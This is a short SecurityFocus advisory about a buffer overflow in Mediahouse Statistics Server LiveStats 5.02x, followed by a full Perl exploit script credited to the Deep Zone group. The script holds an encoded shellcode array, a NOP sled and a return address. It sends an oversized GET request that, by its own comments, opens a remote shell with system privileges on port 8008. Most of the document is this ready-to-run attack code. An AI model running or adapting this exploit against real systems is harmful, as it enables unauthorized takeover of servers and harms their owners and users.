source: http://www.securityfocus.com/bid/1568/info Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code. #!/usr/bin/perl -w # Statistics Server 5.02x's exploit. # usage: ./ssexploit502x.pl hostname port # 00/08/10 # http://www.deepzone.org # http://deepzone.cjb.net # http://mareasvivas.cjb.net (|Zan homepage) # # --|Zan <[email protected]> # ---------------------------------------------------------------- # # This exploit works against Statistics Server 5.02x/Win2k. # # Tested with Win2k (spanish version). # # It spawns a remote winshell on 8008 port. It doesn't kill # webserver so webserver continues running while hack is made. # When hack is finished webserver will run perfectly too. # # Default installation gives us a remote shell with system # privileges. # # overflow discovered by # -- Nemo <[email protected]> # # exploit coded by # -- |Zan <[email protected]> # # ---------------------------------------------------------------- use IO::Socket; @crash = ( "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41", "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f", "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04", "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e", "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32", "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99", "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c", "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9", "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71", "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9", "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93", "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99", "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99", "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14", "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17", "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d", "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99", "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66", "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d", "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7", "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9", "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9", "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a", "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14", "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87", "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9", "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32", "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99", "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98", "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf", "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99", "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3", "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3", "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99", "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99", "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13", "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9", "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2", "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf", "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a", "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c", "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d", "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9", "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa", "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce", "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99", "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3", "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4", "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07", "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c", "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03", "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a", "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b", "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07", "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97", "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9", "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c", "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9", "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99", "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9", "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66", "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d", "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d", "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9", "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99", "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce", "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99", "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1", "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d", "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9", "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99", "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14", "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c", "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99", "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12", "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a", "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34", "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99", "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1", "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2", "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38", "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59", "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce", "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6", "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd", "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8", "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7", "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5", "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed", "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab", "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0", "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8", "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8", "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb", "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc", "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0", "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5", "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8", "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0", "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5", "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc", "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1", "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99", "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc", "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90"); # ------------------------------------------------------------------- sub pcommands { die "usage: $0 hostname port\n" if (@ARGV != 2); ($host) = shift @ARGV; ($port) = shift @ARGV; } sub show_credits { print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n"; print "\n\t\t Coded by |Zan - izan\@deepzone.org\n"; print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\n\n"; } sub bofit { print "\nspawning remote shell on port 8008 ...\n\n"; $s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp"); if(!$s) { die "error.\n"; } print $s "GET http://O"; foreach $item (@crash) { print $s $item } for ($cont=0; $cont<840;$cont++) { print $s "\x90" } print $s "\x8c\x3e\x1d\x01"; print $s "\r\n\r\n"; while (<$s>) { print } print "... done.\n\n"; } # ----- begin show_credits; pcommands; bofit; # ----- that's all :)